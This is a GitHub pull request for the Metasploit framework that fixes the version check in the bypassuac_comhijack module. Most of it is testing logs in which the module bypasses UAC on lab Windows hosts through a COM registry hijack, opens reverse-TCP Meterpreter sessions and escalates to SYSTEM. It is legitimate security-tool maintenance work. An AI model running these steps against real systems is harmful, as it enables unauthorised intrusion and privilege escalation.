Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update check comhijack #16268

Merged
merged 2 commits into from
Mar 4, 2022
Merged

Update check comhijack #16268

merged 2 commits into from
Mar 4, 2022

Conversation

bwatters-r7
Copy link
Contributor

@bwatters-r7 bwatters-r7 commented Mar 3, 2022
edited by smcintyre-r7
Loading

Fixes #16216

This improves the check method for exploit/windows/local/bypassuac_comhijack by verifying build numbers for windows 10 and 2016+ server editions. It also adds the autocheck changes and includes a rubocop cleanup.

Testing

  • Get a Meterpreter session on a windows 7-10 v21H2 workstation and/or Server system.
  • use exploit/windows/local/bypassuac_comhijack
  • set session <session>
  • Verify Windows version prior to 10 v 1903 (Build 18362) are vulnerable through the check method and get an elevated session.
  • Repeat for different targets

Windows 7

msf6 exploit(windows/local/bypassuac_comhijack) > check

[*] System OS Detected: Windows 7 (6.1 Build 7601, Service Pack 1).
[*] The target appears to be vulnerable.
msf6 exploit(windows/local/bypassuac_comhijack) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] System OS Detected: Windows 7 (6.1 Build 7601, Service Pack 1).
[+] The target appears to be vulnerable.
[*] Checking admin status...
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\vTaDaQNy.dll ...
[*] Executing high integrity process C:\Windows\System32\eventvwr.exe
[*] Sending stage (200262 bytes) to 10.5.132.160
[*] Cleaning up registry; this can take some time...
[*] Meterpreter session 23 opened (10.5.135.101:4444 -> 10.5.132.160:49180 ) at 2022-03-03 12:49:21 -0600
[-] Failed to delete C:\Users\msfuser\AppData\Local\Temp\vTaDaQNy.dll: stdapi_fs_delete_file: Operation failed: Access is denied.

meterpreter > sysinfo
Computer        : WIN7X64-SP1
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN7X64-SP1\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Windows 10 v1809

msf6 exploit(windows/local/bypassuac_comhijack) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] System OS Detected: Windows 10 (10.0 Build 17763).
[*] Detected build number: 17763
[+] The target appears to be vulnerable.
[*] Checking admin status...
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\FAiHLtSt.dll ...
[*] Executing high integrity process C:\Windows\System32\eventvwr.exe
[*] Sending stage (200262 bytes) to 10.5.132.104
[*] Cleaning up registry ...
[*] Meterpreter session 21 opened (10.5.135.101:4444 -> 10.5.132.104:49680 ) at 2022-03-03 12:36:10 -0600

meterpreter > sysinfo
Computer        : DESKTOP-6G879SE
OS              : Windows 10 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-6G879SE\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Windows Server 2019

msf6 exploit(windows/local/bypassuac_comhijack) > sessions -i 18
[*] Starting interaction with 18...

meterpreter > sysinfo
Computer        : WIN-2E6BPFGP9F7
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN-2E6BPFGP9F7\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
meterpreter > background
[*] Backgrounding session 18...
msf6 exploit(windows/local/bypassuac_comhijack) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Checking admin status...
[*] System OS Detected: Windows 2016+ (10.0 Build 17763).
[*] Detected build number: 17763
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Computer Managment via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\wCbobiAc.dll ...
[*] Executing high integrity process C:\Windows\System32\mmc.exe
[*] Sending stage (200262 bytes) to 10.5.132.126
[*] Cleaning up registry ...
[*] Meterpreter session 19 opened (10.5.135.101:4444 -> 10.5.132.126:49684 ) at 2022-03-03 12:19:14 -0600

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

Windows 10x64 1909

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-EHIBEQF
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-EHIBEQF\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/bypassuac_comhijack 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/local/bypassuac_comhijack) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_comhijack) > set verbose true
verbose => true
msf6 exploit(windows/local/bypassuac_comhijack) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] System OS Detected: Windows 10 (10.0 Build 18363).
[*] Detected build number: 18363
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_comhijack) >

@bwatters-r7 bwatters-r7 added bug rn-fix release notes fix easy labels Mar 3, 2022
@smcintyre-r7 smcintyre-r7 self-assigned this Mar 4, 2022
smcintyre-r7
smcintyre-r7 approved these changes Mar 4, 2022
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM. I tested that it still works on WIndows 10 v1803, but properly identifies that v21H2 is not vulnerable. Thanks for the patch @bwatters-r7 !

Testing Output

Windows 10 x64 v1803

msf6 exploit(windows/local/bypassuac_comhijack) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/bypassuac_comhijack) > 
msf6 exploit(windows/local/bypassuac_comhijack) > show options 

Module options (exploit/windows/local/bypassuac_comhijack):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  -1               yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/bypassuac_comhijack) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_comhijack) > exploit

[-] Handler failed to bind to 192.168.159.128:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Computer Managment via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\SMCINT~1\AppData\Local\Temp\GKelnqRg.dll ...
[*] Executing high integrity process C:\Windows\System32\mmc.exe
[*] Sending stage (200262 bytes) to 192.168.159.91
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.91:51936 ) at 2022-03-04 09:47:51 -0500
[*] Cleaning up registry; this can take some time...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_comhijack) > jobs

Jobs
====

  Id  Name                    Payload                              Payload opts
  --  ----                    -------                              ------------
  0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.159.128:4444

msf6 exploit(windows/local/bypassuac_comhijack) > check
[*] The target appears to be vulnerable.
msf6 exploit(windows/local/bypassuac_comhijack) > check VERBOSE=true

[*] System OS Detected: Windows 10 (10.0 Build 17134).
[*] Detected build number: 17134
[*] The target appears to be vulnerable.
msf6 exploit(windows/local/bypassuac_comhijack) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > getuid
Server username: DESKTOP-2OL4COJ\smcintyre
meterpreter > sysinfo
Computer        : DESKTOP-2OL4COJ
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >

Windows 10 x64 v21H2

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > getuid
Server username: DESKTOP-SRAQBLH\smcintyre
meterpreter > sysinfo
Computer        : DESKTOP-SRAQBLH
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background 
[*] Backgrounding session 3...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > previous 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_comhijack) > run

[-] Handler failed to bind to 192.168.159.128:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_comhijack) > check
[*] The target is not exploitable.
msf6 exploit(windows/local/bypassuac_comhijack) >

@smcintyre-r7 smcintyre-r7 merged commit 83b2f5a into rapid7:master Mar 4, 2022
@smcintyre-r7
Copy link
Contributor

Release Notes

This updates the check method of the exploit/windows/local/bypassuac_comhijack module to identify Windows 10 versions 1903 and later as not being affected. This also switches the module to run the check method automatically which will help inform users when the target system is or is not vulnerable.

@bwatters-r7 bwatters-r7 deleted the update-check-comhijack branch March 24, 2022 21:02
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
bug easy rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

bypassuac_comhijack should give a meterpreter session, instead it goes back to msfconsole
2 participants
@bwatters-r7 @smcintyre-r7